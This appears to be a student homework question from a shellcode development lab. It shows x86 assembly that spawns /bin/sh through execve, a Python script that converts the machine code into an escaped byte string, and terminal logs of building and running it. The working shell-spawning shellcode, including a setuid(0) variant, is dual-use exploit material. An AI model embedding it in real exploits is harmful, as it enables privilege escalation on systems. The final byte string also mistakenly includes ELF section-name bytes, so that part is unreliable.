
Question


Write an explanation for each command.
Listing 1: A basic shellcode example mysh.s

    section .text
      global _start
        _start:
          ; Store the argument string on stack
          xor  eax, eax
          push eax          ; Use 0 to terminate the string
          push "//sh"
          push "/bin"
          mov  ebx, esp     ; Get the string address

          ; Construct the argument array argv[]
          push eax          ; argv[1] = 0
          push ebx          ; argv[0] points to the cmd string
          mov  ecx, esp     ; Get the address of argv[]

          ; For environment variable
          xor  edx, edx     ; No env variable

          ; Invoke execve()
          xor  eax, eax     ; eax = 0x00000000
          mov   al, 0x0b    ; eax = 0x0000000b
          int 0x80

Listing 2: convert.py

    #!/usr/bin/env python3

    # Run "xxd -p -c 20 mysh.o", and
    # copy and paste the machine code part to the following:
    ori_sh = """
    31db31c0b0d5cd80
    31c050682f2f7368682f62696e89e3505389e131
    d231c0b00bcd80
    """

    sh = ori_sh.replace("\n", "")

    length = int(len(sh)/2)
    print("Length of the shellcode: {}".format(length))
    s = 'shellcode= (\n' + '   "'
    for i in range(length):
        s += "\\x" + sh[2*i] + sh[2*i+1]
        if i > 0 and i % 16 == 15:
            s += '"\n' + '   "'
    s += '"\n' + ").encode('latin-1')"
    print(s)

Terminal:

    [02/17/21]seed@VM:~$ cd Downloads
    [02/17/21]seed@VM:~/Downloads$ ls
    convert.py  mysh.s  myshlo.s  Shellcode-Development-Lab-main  Shellcode-Development-Lab-main.zip  nasm
    [02/17/21]seed@VM:~/Downloads$ nasm -f elf32 mysh.s -o
    The program 'nasm' is currently not installed. You can install it by typing:
    sudo apt install nasm
    [02/17/21]seed@VM:~/Downloads$ sudo apt install nasm
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    The following NEW packages will be installed:
    0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
    Need to get 1,520 kB of archives.
    After this operation, 3,982 kB of additional disk space will be used.
    Get:1 http://us.archive.ubuntu.com/ubuntu xenial/universe i386 nasm i386 2.11.08-1 [1,520 kB]
    Fetched 1,520 kB in 10s (146 kB/s)
    Selecting previously unselected package nasm.
    (Reading database ... 215092 files and directories currently installed.)
    Preparing to unpack ...asm_2.11.08-1_i386.deb ...
    Unpacking nasm (2.11.08-1) ...
    Processing triggers for man-db (2.7.5-1) ...
    Processing triggers for install-info (6.1.0.dfsg.1-5) ...
    Processing triggers for doc-base (0.10.7) ...
    Processing 1 added doc-base file...
    Registering documents with scrollkeeper...
    Setting up nasm (2.11.08-1) ...
    [02/17/21]seed@VM:~/Downloads$ nasm -f elf32 mysh.s -o mysh2.o
    [02/17/21]seed@VM:~/Downloads$
    [02/17/21]seed@VM:~/Downloads$ ld -m elf_i386 mysh2.o -o mysh2
    [02/17/21]seed@VM:~/Downloads$
    [02/17/21]seed@VM:~/Downloads$ echo $$
    4242
    [02/17/21]seed@VM:~/Downloads$
    [02/17/21]seed@VM:~/Downloads$ mysh2
    $ echo $$
    5014
    $

    [02/17/21]seed@VM:~$ cd Downloads
    [02/17/21]seed@VM:~/Downloads$ objdump -Mintel --disassemble mysh2.o

    mysh2.o:     file format elf32-i386

    Disassembly of section .text:

    00000000 <_start>:
       0:   31 c0                   xor    eax,eax
       2:   50                      push   eax
       3:   68 2f 2f 73 68          push   0x68732f2f
       8:   68 2f 62 69 6e          push   0x6e69622f
       d:   89 e3                   mov    ebx,esp
       f:   50                      push   eax
      10:   53                      push   ebx
      11:   89 e1                   mov    ecx,esp
      13:   31 d2                   xor    edx,edx
      15:   31 c0                   xor    eax,eax
      17:   b0 0b                   mov    al,0xb
    [02/17/21]seed@VM:~/Downloads$ xxd -p -c 20 mysh2.o
    (hex dump of mysh2.o; not legible in the transcription)

convert.py (~/Downloads), as opened in gedit:

    #!/usr/bin/python3

    # Run "xxd -p -c 20 rev_sh.o",
    # copy and paste the machine code to the following:
    ori_sh = """
    31c050682f2f7368682f62696e89e3505389e131d231c0b00bcd8000
    00000000002e74657874002e7368737472746162
    002e73796d746162002e737472746162
    """

    sh = ori_sh.replace("\n", "")

    length = int(len(sh)/2)
    print("Length of the shellcode: {}".format(length))
    s = 'shellcode= (\n' + '   "'
    for i in range(length):
        s += "\\x" + sh[2*i] + sh[2*i+1]
        if i > 0 and i % 16 == 15:
            s += '"\n' + '   "'
    s += '"\n' + ").encode('latin-1')"
    print(s)

Terminal:

    [02/17/21]seed@VM:~/Downloads$ ./convert.py
    Length of the shellcode: 64
    shellcode= (
       "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"
       "\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\x00\x00\x00\x00\x00"
       "\x00\x2e\x74\x65\x78\x74\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62"
       "\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72\x74\x61\x62"
    ).encode('latin-1')
    [02/17/21]seed@VM:~/Downloads$
